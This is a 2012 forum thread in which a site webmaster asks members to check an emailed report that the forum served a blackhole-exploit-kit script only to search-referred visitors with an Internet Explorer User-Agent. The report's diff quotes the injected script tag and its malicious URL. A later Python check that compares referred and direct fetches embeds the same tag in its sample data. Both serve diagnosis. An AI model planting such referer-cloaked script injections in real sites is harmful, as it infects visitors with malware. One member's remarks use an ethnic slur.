
Malware Reported @ TechTalkz.com - Need your Help

22-11-2012, 04:16 PM   #1
Strider (Webmaster, Thread Starter)

Malware Reported @ TechTalkz.com - Need your Help

Hello guys,

I found the following email in my inbox. Can you please try to replicate it? We need feedback from various browsers, OS, with/without all techtalkz.com cookies removed etc.

Code:
Hi,

I work in the information security team for a software company. For the
last month or more we have seen your site techtalkz.com redirecting
visitors to a malicious site using the blackhole exploit kit.

This only occurs when you visit your site using a particular User
Agent and Referer header (google.com). The following Linux commands
illustrate this behaviour:

$ wget -U 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0)' --referer 'http://www.google.com'
http://www.techtalkz.com/windows-7/516049-how-change-font-size-icon-size-windows-7-a.html

$ wget -U 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0)'
http://www.techtalkz.com/windows-7/516049-how-change-font-size-icon-size-windows-7-a.html

$ ls -l
total 192
-rw-rw-r--. 95481 Nov  8 13:52
516049-how-change-font-size-icon-size-windows-7-a.html
-rw-rw-r--. 95373 Nov  8 13:53
516049-how-change-font-size-icon-size-windows-7-a.html.1

$ diff 516049-how-change-font-size-icon-size-windows-7-a.html*
364d363
< <script type="text/javascript"
src="http://gurmanaskgaard.org/173190.js?735163&025fed828c35e1fa"></script>
3292c3291
< <div class="smallfont" align="center">All times are GMT +1. The time
now is <span class="time">04:52 AM</span>.</div>
---
> <div class="smallfont" align="center">All times are GMT +1. The time
now is <span class="time">04:53 AM</span>.</div>
Someone has most likely hacked your hosting service and modified your
.htaccess files to produce this behaviour - that would probably be a
good place to start looking for a problem.

If you could fix this up, it would prevent a lot of people being
infected with viruses.

Thanks,
*****.
Thanks
Strider


Last edited by Strider; 26-11-2012 at 02:03 PM..
22-11-2012, 05:19 PM   #2
habibjp (Tachikoma)

Haven't got Linux on any of my computers atm, but the referenced link doesn't redirect or spout any warnings in Chrome, FF or IE.
22-11-2012, 05:20 PM   #3
habibjp (Tachikoma)

Might be worth seeing if any other sites on the hosting service have had the same problem?
22-11-2012, 05:44 PM   #4
echo off (Elite Member (1000+))

Hmm, I got rid of Linux on my machine. But it's weird how some security analyst completely out of the blue says this, bit dodgy to me.
22-11-2012, 05:54 PM   #5
Strider (Webmaster, Thread Starter)

I don't think it's a lie because I remember seeing a warning from Norton web protection last month. I'll have a look when I get back home.
22-11-2012, 06:12 PM   #6
echo off (Elite Member (1000+))

Quote:
Originally Posted by Strider
I don't think it's a lie because I remember seeing a warning from Norton web protection last month. I'll have a look when I get back home.
Hmm, OK, I've never had a warning.
22-11-2012, 09:07 PM   #7
maxmanrules (Elite Member (1000+))

I just get a 404, but it's quite odd: the page for the 404 error is not the same as the standard techtalkz layout. The "Ask the experts" box is slightly offset to the left and the "Search" box looks different.

So do you want me to stick those commands into my console and then try to visit the address?
22-11-2012, 09:46 PM   #8
maxmanrules (Elite Member (1000+))

OK, been doing some research on "Gurmanaskgaard.org".
If I try to visit it, my computer is automatically redirected to... Google. OK, on to the whois.
Firstly, it's registered out of China, using bizcn.com (really ****ing dodgy registrar)
The place it's registered to is either not built yet, or the google map for the area is quite old. The details, such as the mailing address and the company operator are fake.
Now, Mr Fake has also registered 255 other domains, probably for the same purpose.
So we're looking at the work of some Chinese wankers, obviously.
26-11-2012, 02:06 PM   #9
Strider (Webmaster, Thread Starter)

@max: I've edited the first post to remove the BBCode. The most important part is this: --referer 'http://www.google.com'

i.e. the malicious code is inserted into the HTML output only when the pages are opened via a Google search (>> with google.com as referer).

Btw. that domain is now redirecting to google.com (I assume it's been taken down by the registrar or an anti-cybercrime agency). But the exploit still remains in our website.


Update:

I found the issue reported in some other forums:

hacked by url123****** - vBulletin SEO Forums

Google redirecting to filestore123****** - vBulletin SEO Forums

Url123 Redirect. Tried everything, I am at wits end. - vBulletin SEO Forums

I'll try the suggestions in those threads when I get back home.

Last edited by Strider; 26-11-2012 at 02:15 PM..
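The check the emailed report performs with wget and diff, and the referer condition Strider points out above, as an added Python example (not code from the thread): the page is fetched twice with the report's MSIE 8 User-Agent, once with and once without the google.com Referer, and external script sources present only in the referred copy are reported. The sample pages are constructed to mirror the report's diff; the script URL in them is the one quoted there.

```python
import re
import urllib.request

# Header sets taken from the report: identical MSIE 8 User-Agent,
# Referer present on one fetch only.
UA_MSIE8 = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; "
            "Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; "
            ".NET CLR 3.0.30729; Media Center PC 6.0)")
REFERRED = {"User-Agent": UA_MSIE8, "Referer": "http://www.google.com"}
DIRECT = {"User-Agent": UA_MSIE8}

# src= value of every <script ...> tag, across line breaks inside the tag.
SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc=["']([^"']+)["']""", re.I)


def external_script_srcs(html):
    """All src= values of <script> tags in the document."""
    return set(SCRIPT_SRC.findall(html))


def injected_scripts(direct_html, referred_html):
    """Script sources that appear only in the search-referred copy.

    Comparing script sources instead of raw text ignores per-request noise
    (the 'time now' line that also shows up in the report's diff).
    """
    return sorted(external_script_srcs(referred_html)
                  - external_script_srcs(direct_html))


def fetch(url, headers, timeout=20):
    """Fetch url with the given request headers (needs network access)."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def check_url(url):
    """Live check: fetch twice and report scripts present only when referred."""
    return injected_scripts(fetch(url, DIRECT), fetch(url, REFERRED))


# Constructed sample pages modelled on the diff in the report (offline demo).
DIRECT_SAMPLE = """<html><body>
<script type="text/javascript" src="clientscript/vbulletin_global.js"></script>
<div class="smallfont" align="center">The time now is <span class="time">04:53 AM</span>.</div>
</body></html>"""
REFERRED_SAMPLE = DIRECT_SAMPLE.replace("04:53", "04:52").replace(
    "<div", '<script type="text/javascript"\n'
    'src="http://gurmanaskgaard.org/173190.js?735163&025fed828c35e1fa"></script>\n<div', 1)
```

Running `check_url(page)` from a shell outside the hosting account reproduces the report's check without relying on a local diff; an empty list means both copies load the same scripts.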
26-11-2012, 08:42 PM   #10
maxmanrules (Elite Member (1000+))

Hmm, I can't get on those forums, they seem to be down.
